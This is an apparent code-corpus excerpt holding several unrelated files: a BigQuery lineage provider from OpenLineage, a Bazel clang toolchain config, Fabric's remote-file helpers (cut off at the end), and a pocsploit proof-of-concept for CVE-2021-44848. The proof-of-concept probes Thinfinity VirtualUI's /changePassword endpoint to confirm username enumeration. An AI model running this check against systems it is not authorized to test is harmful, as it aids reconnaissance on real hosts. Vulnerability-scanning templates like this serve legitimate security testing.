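    out, attn = mha(x, k=x, q=x, mask=None)  # self-attention over x
    print(out.shape)   # (2, 16, 128): (batch, seq_len, model_depth)
    print(attn.shape)  # (2, 8, 16, 16): (batch, num_heads, seq_len_q, seq_len_k)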
| 44.444444
| 129
| 0.6675
|
794e4fd553852fea14b2360d5386e334b97832db
| 9,995
|
py
|
Python
|
integration/common/openlineage/common/provider/bigquery.py
|
kedar-cz/OpenLineage
|
bd75b53c84fd9655f593c4f161e15c14785eb93e
|
[
"Apache-2.0"
] | null | null | null |
integration/common/openlineage/common/provider/bigquery.py
|
kedar-cz/OpenLineage
|
bd75b53c84fd9655f593c4f161e15c14785eb93e
|
[
"Apache-2.0"
] | null | null | null |
integration/common/openlineage/common/provider/bigquery.py
|
kedar-cz/OpenLineage
|
bd75b53c84fd9655f593c4f161e15c14785eb93e
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import traceback
import attr
from typing import Tuple, Optional, Dict, List
from google.cloud import bigquery
from openlineage.common.dataset import Dataset, Source
from openlineage.common.models import DbTableSchema, DbColumn, DbTableName
from openlineage.common.schema import GITHUB_LOCATION
from openlineage.common.utils import get_from_nullable_chain
from openlineage.client.facet import BaseFacet, OutputStatisticsOutputDatasetFacet
_BIGQUERY_CONN_URL = 'bigquery'
@attr.s
class BigQueryErrorRunFacet(BaseFacet):
"""
Represents errors that can happen during execution of BigqueryExtractor
:param clientError: represents errors originating in bigquery client
:param parserError: represents errors that happened during parsing SQL provided to bigquery
"""
clientError: str = attr.ib(default=None)
parserError: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-error-run-facet.json"
@attr.s
class BigQueryJobRunFacet(BaseFacet):
"""
Facet that represents relevant statistics of bigquery run.
:param cached: bigquery caches query results. Rest of the statistics will not be provided
for cached queries.
:param billedBytes: how many bytes bigquery bills for.
:param properties: full property tree of bigquery run.
"""
cached: bool = attr.ib()
billedBytes: int = attr.ib(default=None)
properties: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-run-facet.json"
@attr.s
class BigQueryStatisticsDatasetFacet(BaseFacet):
"""
Facet that represents statistics of output dataset resulting from bigquery run.
:param outputRows: how many rows query produced.
:param size: size of output dataset in bytes.
"""
rowCount: int = attr.ib()
size: int = attr.ib()
def to_openlineage(self) -> OutputStatisticsOutputDatasetFacet:
return OutputStatisticsOutputDatasetFacet(
rowCount=self.rowCount,
size=self.size
)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-dataset-facet.json"
@attr.s
class BigQueryFacets:
run_facets: Dict[str, BaseFacet] = attr.ib()
inputs: List[Dataset] = attr.ib()
output: Optional[Dataset] = attr.ib(default=None)
class BigQueryDatasetsProvider:
def __init__(
self,
client: Optional[bigquery.Client] = None,
logger: Optional[logging.Logger] = None
):
self.client = client
if client is None:
self.client = bigquery.Client()
self.logger = logger
if logger is None:
self.logger = logging.getLogger(__name__)
def get_facets(self, job_id: str) -> BigQueryFacets:
inputs = []
output = None
run_facets = {}
try:
try:
job = self.client.get_job(job_id=job_id)
props = job._properties
run_stat_facet, dataset_stat_facet = self._get_output_statistics(props)
run_facets.update({
"bigQuery_job": run_stat_facet
})
inputs = self._get_input_from_bq(props)
output = self._get_output_from_bq(props)
if output and dataset_stat_facet:
output.custom_facets.update({
"stats": dataset_stat_facet
})
output.output_facets.update({
'outputStatistics': dataset_stat_facet.to_openlineage()
})
finally:
# Ensure client has close() defined, otherwise ignore.
# NOTE: close() was introduced in python-bigquery v1.23.0
if hasattr(self.client, "close"):
self.client.close()
except Exception as e:
self.logger.error(
f"Cannot retrieve job details from BigQuery.Client. {e}",
exc_info=True
)
run_facets.update({
"bigQuery_error": BigQueryErrorRunFacet(
clientError=f"{e}: {traceback.format_exc()}",
)
})
return BigQueryFacets(run_facets, inputs, output)
def _get_output_statistics(self, properties) \
-> Tuple[BigQueryJobRunFacet, Optional[BigQueryStatisticsDatasetFacet]]:
stages = get_from_nullable_chain(properties, ['statistics', 'query', 'queryPlan'])
json_props = json.dumps(properties)
if not stages:
if get_from_nullable_chain(properties, ['statistics', 'query', 'statementType']) \
== 'CREATE_VIEW':
return BigQueryJobRunFacet(cached=False), None
# we're probably getting cached results
if get_from_nullable_chain(properties, ['statistics', 'query', 'cacheHit']):
return BigQueryJobRunFacet(cached=True), None
if get_from_nullable_chain(properties, ['status', 'state']) != "DONE":
raise ValueError("Trying to extract data from running bigquery job")
raise ValueError(
f"BigQuery properties did not have required data: queryPlan - {json_props}"
)
out_stage = stages[-1]
out_rows = out_stage.get("recordsWritten", None)
out_bytes = out_stage.get("shuffleOutputBytes", None)
billed_bytes = get_from_nullable_chain(properties, [
'statistics', 'query', 'totalBytesBilled'
])
return BigQueryJobRunFacet(
cached=False,
billedBytes=int(billed_bytes) if billed_bytes else None,
properties=json_props
), BigQueryStatisticsDatasetFacet(
rowCount=int(out_rows),
size=int(out_bytes)
) if out_bytes and out_rows else None
def _get_input_from_bq(self, properties):
bq_input_tables = get_from_nullable_chain(properties, [
'statistics', 'query', 'referencedTables'
])
if not bq_input_tables:
return []
input_table_names = [
self._bq_table_name(bq_t) for bq_t in bq_input_tables
]
sources = [
self._source() for bq_t in bq_input_tables
]
try:
return [
Dataset.from_table_schema(
source=source,
table_schema=table_schema
)
for table_schema, source in zip(self._get_table_schemas(
input_table_names
), sources)
]
except Exception as e:
self.logger.warning(f'Could not extract schema from bigquery. {e}')
return [
Dataset.from_table(source, table)
for table, source in zip(input_table_names, sources)
]
def _get_output_from_bq(self, properties) -> Optional[Dataset]:
bq_output_table = get_from_nullable_chain(properties, [
'configuration', 'query', 'destinationTable'
])
if not bq_output_table:
return None
output_table_name = self._bq_table_name(bq_output_table)
source = self._source()
table_schema = self._get_table_safely(output_table_name)
if table_schema:
return Dataset.from_table_schema(
source=source,
table_schema=table_schema,
)
else:
self.logger.warning("Could not resolve output table from bq")
return Dataset.from_table(source, output_table_name)
def _get_table_safely(self, output_table_name):
try:
return self._get_table(output_table_name)
except Exception as e:
self.logger.warning(f'Could not extract output schema from bigquery. {e}')
return None
def _get_table_schemas(self, tables: [str]) \
-> [DbTableSchema]:
# Avoid querying BigQuery by returning an empty array
# if no tables have been provided.
if not tables:
return []
return [self._get_table(table) for table in tables]
def _get_table(self, table: str) -> Optional[DbTableSchema]:
bq_table = self.client.get_table(table)
if not bq_table._properties:
return
table = bq_table._properties
fields = get_from_nullable_chain(table, ['schema', 'fields'])
if not fields:
return
columns = [DbColumn(
name=fields[i].get('name'),
type=fields[i].get('type'),
description=fields[i].get('description'),
ordinal_position=i
) for i in range(len(fields))]
return DbTableSchema(
schema_name=table.get('tableReference').get('projectId') + '.' +
table.get('tableReference').get('datasetId'),
table_name=DbTableName(table.get('tableReference').get('tableId')),
columns=columns
)
def _source(self) -> Source:
return Source(
scheme='bigquery',
connection_url='bigquery'
)
def _bq_table_name(self, bq_table):
project = bq_table.get('projectId')
dataset = bq_table.get('datasetId')
table = bq_table.get('tableId')
return f"{project}.{dataset}.{table}"
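# A minimal usage sketch, not part of the original module; the job id below is
# a hypothetical example, and get_facets() requires Google Cloud credentials
# that allow bigquery.Client to look the job up.
if __name__ == '__main__':
    provider = BigQueryDatasetsProvider()
    facets = provider.get_facets(job_id='example-job-id')
    print(facets.run_facets)
    print(facets.inputs, facets.output)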
| 35.569395
| 95
| 0.62081
|
794e50c86281f1c318e204be96764db3bbdb104b
| 1,988
|
py
|
Python
|
2021/CVE-2021-44848/poc/pocsploit/CVE-2021-44848.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 421
|
2021-12-07T08:46:40.000Z
|
2022-03-31T12:42:16.000Z
|
2021/CVE-2021-44848/poc/pocsploit/CVE-2021-44848.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
2021/CVE-2021-44848/poc/pocsploit/CVE-2021-44848.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 144
|
2021-12-07T11:06:14.000Z
|
2022-03-31T07:41:35.000Z
|
import re
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Thinfinity VirtualUI User Enumeration''',
"description": '''Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)''',
"severity": "medium",
"references": [
"https://github.com/cybelesoft/virtualui/issues/1",
"https://nvd.nist.gov/vuln/detail/CVE-2021-44848",
"https://www.tenable.com/cve/CVE-2021-44848"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-44848",
"cwe-id": "CWE-287"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "exposure", "thinfinity", "virtualui"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/changePassword?username=administrator"""
method = "GET"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (re.search(r"""rc":(.*?)""",resp0.text) and re.search(r"""msg":"(.*?)""",resp0.text)) and (resp0.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
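# A minimal usage sketch, not part of the original PoC; the target below is a
# hypothetical placeholder and should only be replaced with a host you are
# authorized to test.
if __name__ == '__main__':
    print(poc('target.example.com'))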
| 28.811594
| 219
| 0.552817
|
794e51e631823cbf3206722135293ab85a845c98
| 8,088
|
bzl
|
Python
|
unix_toolchain_config.bzl
|
improbable-eng/BazelCon2019-cpp-toolchains-example
|
0e93672d5025a97a056a3029cbf496fc3a12183f
|
[
"MIT"
] | null | null | null |
unix_toolchain_config.bzl
|
improbable-eng/BazelCon2019-cpp-toolchains-example
|
0e93672d5025a97a056a3029cbf496fc3a12183f
|
[
"MIT"
] | null | null | null |
unix_toolchain_config.bzl
|
improbable-eng/BazelCon2019-cpp-toolchains-example
|
0e93672d5025a97a056a3029cbf496fc3a12183f
|
[
"MIT"
] | null | null | null |
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"action_config",
"artifact_name_pattern",
"env_entry",
"env_set",
"feature",
"feature_set",
"flag_group",
"flag_set",
"make_variable",
"tool",
"tool_path",
"variable_with_value",
"with_feature_set",
)
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
load("@bazel_tools//tools/cpp:cc_toolchain_config.bzl", "all_compile_actions", "all_link_actions")
CLANG_OPTIONS = {
"compile_flags": [
"-Wall",
"-Wextra",
"-Werror",
"-Wpedantic",
"-fcolor-diagnostics",
# Keep stack frames for debugging, even in opt mode.
"-fno-omit-frame-pointer",
# Security hardening on by default.
# Conservative choice; -D_FORTIFY_SOURCE=2 may be unsafe in some cases.
# We need to undef it before redefining it as some distributions now have
# it enabled by default.
"-U_FORTIFY_SOURCE",
"-D_FORTIFY_SOURCE=1",
"-fstack-protector",
# Do not export symbols by default.
"-fvisibility=hidden",
"-fno-common",
],
"dbg_compile_flags": [
"-O0",
"-g",
],
"opt_compile_flags": [
"-g0",
# Conservative choice for -O.
# -O3 can increase binary size and even slow down the resulting binaries.
# Profile first and / or use FDO if you need better performance than this.
"-O2",
# Disable assertions.
"-DNDEBUG",
# Removal of unused code and data at link time (can this increase binary size in some cases?).
"-ffunction-sections",
"-fdata-sections",
],
"unfiltered_compile_flags": [
# Make compilation deterministic.
"-no-canonical-prefixes",
"-Wno-builtin-macro-redefined",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
"cxx_flags": [
"-std=c++11",
"-stdlib=libstdc++",
# Do not export symbols by default.
"-fvisibility-inlines-hidden",
],
"link_flags": [
"-latomic",
# Anticipated future default.
"-no-canonical-prefixes",
# Security hardening on by default.
"-Wl,-z,relro,-z,now",
"-lstdc++",
# ALL THE WARNINGS AND ERRORS - even during linking.
"-Wall",
"-Wextra",
"-Werror",
"-Wpedantic",
],
"opt_link_flags": [
"-O4",
"-Wl,--gc-sections",
],
}
def _impl(ctx):
tool_paths = [
tool_path(
name = name,
path = path,
)
for name, path in ctx.attr.tool_paths.items()
]
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_compile_actions,
flag_groups = ([flag_group(flags = ctx.attr.compile_flags)] if ctx.attr.compile_flags else []),
),
flag_set(
actions = all_compile_actions,
flag_groups = ([flag_group(flags = ctx.attr.dbg_compile_flags)] if ctx.attr.dbg_compile_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
flag_set(
actions = all_compile_actions,
flag_groups = ([flag_group(flags = ctx.attr.opt_compile_flags)] if ctx.attr.opt_compile_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = ctx.attr.cxx_flags)] if ctx.attr.cxx_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = ctx.attr.link_flags)] if ctx.attr.link_flags else []),
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = ctx.attr.opt_link_flags)] if ctx.attr.opt_link_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = ctx.attr.dbg_link_flags)] if ctx.attr.dbg_link_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
],
)
dbg_feature = feature(name = "dbg")
opt_feature = feature(name = "opt")
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [flag_group(flags = ctx.attr.unfiltered_compile_flags)],
),
],
)
supports_pic_feature = feature(name = "supports_pic", enabled = True)
features = [
default_compile_flags_feature,
default_link_flags_feature,
dbg_feature,
opt_feature,
supports_dynamic_linker_feature,
supports_pic_feature,
unfiltered_compile_flags_feature,
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
toolchain_identifier = ctx.attr.toolchain_identifier,
host_system_name = "x86_64-gcc_libstdcpp-linux",
target_system_name = ctx.attr.target_system_name,
target_cpu = ctx.attr.target_cpu,
target_libc = "local",
compiler = ctx.attr.compiler,
abi_version = ctx.attr.abi_version,
abi_libc_version = "local",
tool_paths = tool_paths,
features = features,
builtin_sysroot = ctx.attr.sysroot,
cxx_builtin_include_directories = ctx.attr.include_directories,
)
unix_cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"abi_version": attr.string(mandatory = True),
"target_cpu": attr.string(mandatory = True),
"target_system_name": attr.string(mandatory = True),
"toolchain_identifier": attr.string(mandatory = True),
"tool_paths": attr.string_dict(mandatory = False),
# Optional parameters.
"compiler": attr.string(default = "generic_compiler_version"),
"compile_flags": attr.string_list(default = []),
"dbg_compile_flags": attr.string_list(default = []),
"opt_compile_flags": attr.string_list(default = []),
"unfiltered_compile_flags": attr.string_list(default = []),
"link_flags": attr.string_list(default = []),
"dbg_link_flags": attr.string_list(default = []),
"opt_link_flags": attr.string_list(default = []),
"cxx_flags": attr.string_list(default = []),
"include_directories": attr.string_list(default = []),
"sysroot": attr.string(default = ""),
},
provides = [CcToolchainConfigInfo],
)
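# A minimal usage sketch, not part of the original file, showing how a BUILD
# file that loads this .bzl might instantiate the rule; the target name, tool
# paths and identifiers below are hypothetical example values.
#
# unix_cc_toolchain_config(
#     name = "k8_clang_toolchain_config",
#     toolchain_identifier = "k8-clang",
#     target_system_name = "x86_64-unknown-linux-gnu",
#     target_cpu = "k8",
#     abi_version = "clang",
#     tool_paths = {"gcc": "/usr/bin/clang", "ld": "/usr/bin/ld", "ar": "/usr/bin/ar"},
#     compile_flags = CLANG_OPTIONS["compile_flags"],
#     cxx_flags = CLANG_OPTIONS["cxx_flags"],
#     link_flags = CLANG_OPTIONS["link_flags"],
# )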
| 34.564103
| 119
| 0.574184
|
794e522a02315848d186828f0cc557e7c8d2fe4f
| 15,728
|
py
|
Python
|
fabric/contrib/files.py
|
hrubi/fabric
|
5b7ba26915c188b7748dccd659d26e7b7e9056ae
|
[
"BSD-2-Clause"
] | 1
|
2015-11-06T10:46:27.000Z
|
2015-11-06T10:46:27.000Z
|
fabric/contrib/files.py
|
hrubi/fabric
|
5b7ba26915c188b7748dccd659d26e7b7e9056ae
|
[
"BSD-2-Clause"
] | null | null | null |
fabric/contrib/files.py
|
hrubi/fabric
|
5b7ba26915c188b7748dccd659d26e7b7e9056ae
|
[
"BSD-2-Clause"
] | 2
|
2019-01-01T18:35:50.000Z
|
2021-03-04T10:32:03.000Z
|
"""
Module providing easy API for working with remote files and folders.
"""
from __future__ import with_statement
import hashlib
import tempfile
import re
import os
from StringIO import StringIO
from fabric.api import *
from fabric.utils import apply_lcwd
def exists(path, use_sudo=False, verbose=False):
"""
Return True if given path exists on the current remote host.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
`exists` will, by default, hide all output (including the run line, stdout,
stderr and any warning resulting from the file not existing) in order to
avoid cluttering output. You may specify ``verbose=True`` to change this
behavior.
"""
func = use_sudo and sudo or run
cmd = 'test -e %s' % _expand_path(path)
# If verbose, run normally
if verbose:
with settings(warn_only=True):
return not func(cmd).failed
# Otherwise, be quiet
with settings(hide('everything'), warn_only=True):
return not func(cmd).failed
def is_link(path, use_sudo=False, verbose=False):
"""
Return True if the given path is a symlink on the current remote host.
If ``use_sudo`` is True, will use `.sudo` instead of `.run`.
`.is_link` will, by default, hide all output. Give ``verbose=True`` to change this.
"""
func = sudo if use_sudo else run
cmd = 'test -L "$(echo %s)"' % path
args, kwargs = [], {'warn_only': True}
if not verbose:
        args = [hide('everything')]
with settings(*args, **kwargs):
return func(cmd).succeeded
def first(*args, **kwargs):
"""
Given one or more file paths, returns first one found, or None if none
exist. May specify ``use_sudo`` and ``verbose`` which are passed to `exists`.
"""
for directory in args:
if exists(directory, **kwargs):
return directory
def upload_template(filename, destination, context=None, use_jinja=False,
template_dir=None, use_sudo=False, backup=True, mirror_local_mode=False,
mode=None):
"""
Render and upload a template text file to a remote host.
Returns the result of the inner call to `~fabric.operations.put` -- see its
documentation for details.
``filename`` should be the path to a text file, which may contain `Python
string interpolation formatting
<http://docs.python.org/library/stdtypes.html#string-formatting>`_ and will
be rendered with the given context dictionary ``context`` (if given.)
Alternately, if ``use_jinja`` is set to True and you have the Jinja2
templating library available, Jinja will be used to render the template
instead. Templates will be loaded from the invoking user's current working
directory by default, or from ``template_dir`` if given.
The resulting rendered file will be uploaded to the remote file path
``destination``. If the destination file already exists, it will be
renamed with a ``.bak`` extension unless ``backup=False`` is specified.
By default, the file will be copied to ``destination`` as the logged-in
user; specify ``use_sudo=True`` to use `sudo` instead.
The ``mirror_local_mode`` and ``mode`` kwargs are passed directly to an
internal `~fabric.operations.put` call; please see its documentation for
details on these two options.
.. versionchanged:: 1.1
Added the ``backup``, ``mirror_local_mode`` and ``mode`` kwargs.
"""
func = use_sudo and sudo or run
# Normalize destination to be an actual filename, due to using StringIO
with settings(hide('everything'), warn_only=True):
if func('test -d %s' % _expand_path(destination)).succeeded:
sep = "" if destination.endswith('/') else "/"
destination += sep + os.path.basename(filename)
# Use mode kwarg to implement mirror_local_mode, again due to using
# StringIO
if mirror_local_mode and mode is None:
mode = os.stat(filename).st_mode
# To prevent put() from trying to do this
# logic itself
mirror_local_mode = False
# Process template
text = None
if use_jinja:
try:
template_dir = template_dir or os.getcwd()
template_dir = apply_lcwd(template_dir, env)
from jinja2 import Environment, FileSystemLoader
jenv = Environment(loader=FileSystemLoader(template_dir))
text = jenv.get_template(filename).render(**context or {})
# Force to a byte representation of Unicode, or str()ification
# within Paramiko's SFTP machinery may cause decode issues for
# truly non-ASCII characters.
text = text.encode('utf-8')
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + "\nUnable to import Jinja2 -- see above.")
else:
filename = apply_lcwd(filename, env)
with open(os.path.expanduser(filename)) as inputfile:
text = inputfile.read()
if context:
text = text % context
# Back up original file
if backup and exists(destination):
func("cp %s{,.bak}" % _expand_path(destination))
# Upload the file.
return put(
local_path=StringIO(text),
remote_path=destination,
use_sudo=use_sudo,
mirror_local_mode=mirror_local_mode,
mode=mode
)
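# A minimal usage sketch, not part of the original module, meant for a user's
# fabfile rather than this library; the template name, destination and context
# values below are hypothetical examples.
def _example_upload_template():  # illustrative only, never called by this module
    upload_template('nginx.conf.j2', '/etc/nginx/nginx.conf',
                    context={'server_name': 'example.com'},
                    use_jinja=True, use_sudo=True, backup=True)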
def sed(filename, before, after, limit='', use_sudo=False, backup='.bak',
flags='', shell=False):
"""
Run a search-and-replace on ``filename`` with given regex patterns.
    Equivalent to ``sed -i<backup> -r -e "/<limit>/ s/<before>/<after>/<flags>g"
    <filename>``. Setting ``backup`` to an empty string will disable backup
    file creation.
For convenience, ``before`` and ``after`` will automatically escape forward
slashes, single quotes and parentheses for you, so you don't need to
specify e.g. ``http:\/\/foo\.com``, instead just using ``http://foo\.com``
is fine.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
The ``shell`` argument will be eventually passed to `run`/`sudo`. It
defaults to False in order to avoid problems with many nested levels of
quotes and backslashes. However, setting it to True may help when using
``~fabric.operations.cd`` to wrap explicit or implicit ``sudo`` calls.
    (``cd`` by its nature is a shell built-in, not a standalone command, so it
should be called within a shell.)
Other options may be specified with sed-compatible regex flags -- for
example, to make the search and replace case insensitive, specify
``flags="i"``. The ``g`` flag is always specified regardless, so you do not
need to remember to include it when overriding this parameter.
.. versionadded:: 1.1
The ``flags`` parameter.
.. versionadded:: 1.6
Added the ``shell`` keyword argument.
"""
func = use_sudo and sudo or run
# Characters to be escaped in both
for char in "/'":
before = before.replace(char, r'\%s' % char)
after = after.replace(char, r'\%s' % char)
# Characters to be escaped in replacement only (they're useful in regexen
# in the 'before' part)
for char in "()":
after = after.replace(char, r'\%s' % char)
if limit:
limit = r'/%s/ ' % limit
context = {
'script': r"'%ss/%s/%s/%sg'" % (limit, before, after, flags),
'filename': _expand_path(filename),
'backup': backup
}
# Test the OS because of differences between sed versions
with hide('running', 'stdout'):
platform = run("uname")
if platform in ('NetBSD', 'OpenBSD', 'QNX'):
# Attempt to protect against failures/collisions
hasher = hashlib.sha1()
hasher.update(env.host_string)
hasher.update(filename)
context['tmp'] = "/tmp/%s" % hasher.hexdigest()
# Use temp file to work around lack of -i
expr = r"""cp -p %(filename)s %(tmp)s \
&& sed -r -e %(script)s %(filename)s > %(tmp)s \
&& cp -p %(filename)s %(filename)s%(backup)s \
&& mv %(tmp)s %(filename)s"""
else:
context['extended_regex'] = '-E' if platform == 'Darwin' else '-r'
expr = r"sed -i%(backup)s %(extended_regex)s -e %(script)s %(filename)s"
command = expr % context
return func(command, shell=shell)
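# A minimal usage sketch, not part of the original module, meant for a user's
# fabfile; the file name and patterns below are hypothetical examples.
def _example_sed():  # illustrative only, never called by this module
    # Rewrites the listen port in place, keeping a .bak copy of the original.
    sed('/etc/redis/redis.conf', before=r'^port 6379$', after='port 6380',
        use_sudo=True, backup='.bak')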
def uncomment(filename, regex, use_sudo=False, char='#', backup='.bak',
shell=False):
"""
Attempt to uncomment all lines in ``filename`` matching ``regex``.
The default comment delimiter is `#` and may be overridden by the ``char``
argument.
This function uses the `sed` function, and will accept the same
``use_sudo``, ``shell`` and ``backup`` keyword arguments that `sed` does.
`uncomment` will remove a single whitespace character following the comment
character, if it exists, but will preserve all preceding whitespace. For
example, ``# foo`` would become ``foo`` (the single space is stripped) but
`` # foo`` would become `` foo`` (the single space is still stripped,
but the preceding 4 spaces are not.)
.. versionchanged:: 1.6
Added the ``shell`` keyword argument.
"""
return sed(
filename,
before=r'^([[:space:]]*)%s[[:space:]]?' % char,
after=r'\1',
limit=regex,
use_sudo=use_sudo,
backup=backup,
shell=shell
)
def comment(filename, regex, use_sudo=False, char='#', backup='.bak',
shell=False):
"""
Attempt to comment out all lines in ``filename`` matching ``regex``.
The default commenting character is `#` and may be overridden by the
``char`` argument.
This function uses the `sed` function, and will accept the same
``use_sudo``, ``shell`` and ``backup`` keyword arguments that `sed` does.
`comment` will prepend the comment character to the beginning of the line,
so that lines end up looking like so::
this line is uncommented
#this line is commented
# this line is indented and commented
In other words, comment characters will not "follow" indentation as they
sometimes do when inserted by hand. Neither will they have a trailing space
unless you specify e.g. ``char='# '``.
.. note::
In order to preserve the line being commented out, this function will
wrap your ``regex`` argument in parentheses, so you don't need to. It
will ensure that any preceding/trailing ``^`` or ``$`` characters are
correctly moved outside the parentheses. For example, calling
``comment(filename, r'^foo$')`` will result in a `sed` call with the
"before" regex of ``r'^(foo)$'`` (and the "after" regex, naturally, of
``r'#\\1'``.)
.. versionadded:: 1.5
Added the ``shell`` keyword argument.
"""
carot, dollar = '', ''
if regex.startswith('^'):
carot = '^'
regex = regex[1:]
if regex.endswith('$'):
dollar = '$'
regex = regex[:-1]
regex = "%s(%s)%s" % (carot, regex, dollar)
return sed(
filename,
before=regex,
after=r'%s\1' % char,
use_sudo=use_sudo,
backup=backup,
shell=shell
)
def contains(filename, text, exact=False, use_sudo=False, escape=True,
shell=False):
"""
Return True if ``filename`` contains ``text`` (which may be a regex.)
By default, this function will consider a partial line match (i.e. where
``text`` only makes up part of the line it's on). Specify ``exact=True`` to
change this behavior so that only a line containing exactly ``text``
results in a True return value.
This function leverages ``egrep`` on the remote end (so it may not follow
Python regular expression syntax perfectly), and skips ``env.shell``
wrapper by default.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
If ``escape`` is False, no extra regular expression related escaping is
performed (this includes overriding ``exact`` so that no ``^``/``$`` is
added.)
The ``shell`` argument will be eventually passed to ``run/sudo``. See
    description of the same argument in ``~fabric.contrib.sed`` for details.
.. versionchanged:: 1.0
Swapped the order of the ``filename`` and ``text`` arguments to be
consistent with other functions in this module.
.. versionchanged:: 1.4
Updated the regular expression related escaping to try and solve
various corner cases.
.. versionchanged:: 1.4
Added ``escape`` keyword argument.
.. versionadded:: 1.6
Added the ``shell`` keyword argument.
"""
func = use_sudo and sudo or run
if escape:
text = _escape_for_regex(text)
if exact:
text = "^%s$" % text
with settings(hide('everything'), warn_only=True):
egrep_cmd = 'egrep "%s" %s' % (text, _expand_path(filename))
return func(egrep_cmd, shell=shell).succeeded
def append(filename, text, use_sudo=False, partial=False, escape=True,
shell=False):
"""
Append string (or list of strings) ``text`` to ``filename``.
When a list is given, each string inside is handled independently (but in
the order given.)
If ``text`` is already found in ``filename``, the append is not run, and
None is returned immediately. Otherwise, the given text is appended to the
end of the given ``filename`` via e.g. ``echo '$text' >> $filename``.
The test for whether ``text`` already exists defaults to a full line match,
e.g. ``^<text>$``, as this seems to be the most sensible approach for the
"append lines to a file" use case. You may override this and force partial
searching (e.g. ``^<text>``) by specifying ``partial=True``.
Because ``text`` is single-quoted, single quotes will be transparently
backslash-escaped. This can be disabled with ``escape=False``.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
The ``shell`` argument will be eventually passed to ``run/sudo``. See
    description of the same argument in ``~fabric.contrib.sed`` for details.
.. versionchanged:: 0.9.1
Added the ``partial`` keyword argument.
.. versionchanged:: 1.0
Swapped the order of the ``filename`` and ``text`` arguments to be
consistent with other functions in this module.
.. versionchanged:: 1.0
Changed default value of ``partial`` kwarg to be ``False``.
.. versionchanged:: 1.4
Updated the regular expression related escaping to try and solve
various corner cases.
.. versionadded:: 1.6
Added the ``shell`` keyword argument.
"""
func = use_sudo and sudo or run
# Normalize non-list input to be a list
if isinstance(text, basestring):
text = [text]
for line in text:
regex = '^' + _escape_for_regex(line) + ('' if partial else '$')
if (exists(filename, use_sudo=use_sudo) and line
and contains(filename, regex, use_sudo=use_sudo, escape=False,
shell=shell)):
continue
line = line.replace("'", r"'\\''") if escape else line
func("echo '%s' >> %s" % (line, _expand_path(filename)))
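# A minimal usage sketch, not part of the original module, meant for a user's
# fabfile; the file and line below are hypothetical examples. append() already
# skips lines that are present, so the contains() check is only illustrative.
def _example_append():  # illustrative only, never called by this module
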